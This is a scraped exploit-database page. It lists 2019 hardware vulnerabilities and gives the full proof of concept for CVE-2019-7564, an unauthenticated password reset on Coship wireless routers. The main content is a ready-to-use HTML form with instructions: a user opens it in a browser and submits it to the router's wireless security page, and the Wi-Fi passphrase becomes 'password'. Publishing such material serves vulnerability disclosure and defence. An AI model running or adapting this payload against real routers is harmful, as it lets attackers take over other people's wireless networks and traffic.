Menu

Improved exploit search engine. Try python and hit enter

"Coship Wireless Router 4.0.0.x/5.0.0.x - WiFi Password Reset"

Author

"Adithyan AK"

Platform

hardware

Release date

2019-02-11

Release Date Title Type Platform Author
2019-03-20 "PLC Wireless Router GPN2.4P21-C-CN - Cross-Site Request Forgery" webapps hardware "Kumar Saurav"
2019-03-20 "PLC Wireless Router GPN2.4P21-C-CN - Incorrect Access Control" webapps hardware "Kumar Saurav"
2019-03-08 "Sony Playstation 4 (PS4) < 6.20 - WebKit Code Execution (PoC)" local hardware Specter
2019-03-07 "QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)" remote hardware AkkuS
2019-03-04 "Fiberhome AN5506-04-F RP2669 - Persistent Cross-Site Scripting" webapps hardware Tauco
2019-03-04 "Raisecom XPON ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 - Remote Code Execution" webapps hardware JameelNabbo
2019-02-28 "Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow" dos hardware "Artem Metla"
2019-02-22 "Teracue ENC-400 - Command Injection / Missing Authentication" webapps hardware "Stephen Shkardoon"
2019-02-21 "MikroTik RouterOS < 6.43.12 (stable) / < 6.42.12 (long-term) - Firewall and NAT Bypass" remote hardware "Jacob Baines"
2019-02-20 "Belkin Wemo UPnP - Remote Code Execution (Metasploit)" remote hardware Metasploit
2019-02-13 "Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Admin Token Disclosure)" webapps hardware "Ronnie T Baby"
2019-02-13 "Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Password Disclosure)" webapps hardware "Ronnie T Baby"
2019-02-13 "Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Reflected Cross-Site Scripting" webapps hardware "Ronnie T Baby"
2019-02-11 "Coship Wireless Router 4.0.0.x/5.0.0.x - WiFi Password Reset" webapps hardware "Adithyan AK"
2019-02-05 "Zyxel VMG3312-B10B DSL-491HNU-B1B v2 Modem - Cross-Site Request Forgery" webapps hardware "Yusuf Furkan"
2019-02-05 "devolo dLAN 550 duo+ Starter Kit - Remote Code Execution" webapps hardware sm
2019-02-05 "devolo dLAN 550 duo+ Starter Kit - Cross-Site Request Forgery" webapps hardware sm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Arbitrary File Disclosure" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Remote Code Execution" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Cross-Site Request Forgery (Add Admin)" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - RTSP Stream Disclosure" webapps hardware LiquidWorm
2019-01-28 "Cisco Firepower Management Center 6.2.2.2 / 6.2.3 - Cross-Site Scripting" webapps hardware "Bhushan B. Patil"
2019-01-28 "Cisco RV300 / RV320 - Information Disclosure" webapps hardware "Harom Ramos"
2019-01-28 "AirTies Air5341 Modem 1.0.0.12 - Cross-Site Request Forgery" webapps hardware "Ali Can Gönüllü"
2019-01-25 "Cisco RV320 Dual Gigabit WAN VPN Router 1.4.2.15 - Command Injection" webapps hardware "RedTeam Pentesting"
2019-01-24 "Zyxel NBG-418N v2 Modem 1.00(AAXM.6)C0 - Cross-Site Request Forgery" webapps hardware "Ali Can Gönüllü"
2019-01-28 "Sricam gSOAP 2.8 - Denial of Service" dos hardware "Andrew Watson"
2019-01-16 "Coship Wireless Router 4.0.0.48 / 4.0.0.40 / 5.0.0.54 / 5.0.0.55 / 10.0.0.49 - Unauthenticated Admin Password Reset" webapps hardware "Adithyan AK"
2019-01-16 "GL-AR300M-Lite 2.27 - Authenticated Command Injection / Arbitrary File Download / Directory Traversal" webapps hardware "Pasquale Turi"
2019-01-16 "FortiGate FortiOS < 6.0.3 - LDAP Credential Disclosure" webapps hardware "Julio Ureña"
Release Date Title Type Platform Author
2019-02-11 "Coship Wireless Router 4.0.0.x/5.0.0.x - WiFi Password Reset" webapps hardware "Adithyan AK"
2019-01-16 "Coship Wireless Router 4.0.0.48 / 4.0.0.40 / 5.0.0.54 / 5.0.0.55 / 10.0.0.49 - Unauthenticated Admin Password Reset" webapps hardware "Adithyan AK"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46336/?format=json')
For full documentation follow the link above

Ads

Browse exploit DB API Browse

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
# Exploit Title: Coship Wireless Router – Wireless SSID Unauthenticated Password Reset
# Date: 07.02.2019
# Exploit Author: Adithyan AK
# Vendor Homepage: http://en.coship.com/
# Category: Hardware (WiFi Router)
# Affected Versions *: *Coship RT3052 - 4.0.0.48, Coship RT3050 - 4.0.0.40, Coship WM3300 - 5.0.0.54, Coship WM3300 - 5.0.0.55, Coship RT7620 - 10.0.0.49.
# Tested on: MacOS Mojave v.10.14
# CVE: CVE-2019-7564

#POC :

# Change the X.X.X.X in poc to Router Gateway address and save the below code as Exploit.html
# Open Exploit.html with your Browser
# Click on “Submit request”
# The password of the Wireless SSID will be changed to "password"

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://X.X.X.X/regx/wireless/wl_security_2G.asp
<http://router-ip/regx/wireless/wl_security_2G.asp>" method="POST">
      <input type="hidden" name="wl&#95;wep" value="disabled" />
      <input type="hidden" name="wl&#95;auth&#95;mode" value="none" />
      <input type="hidden" name="page" value="wl&#95;security&#95;2G&#46;asp" />
      <input type="hidden" name="wl&#95;unit" value="0" />
      <input type="hidden" name="action" value="Apply" />
      <input type="hidden" name="wl&#95;auth" value="0" />
      <input type="hidden" name="wl&#95;akm" value="psk&#32;psk2" />
      <input type="hidden" name="wl&#95;crypto" value="tkip&#43;aes" />
      <input type="hidden" name="wl&#95;wpa&#95;gtk&#95;rekey" value="0" />
      <input type="hidden" name="wl&#95;wpa&#95;psk" value="password" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>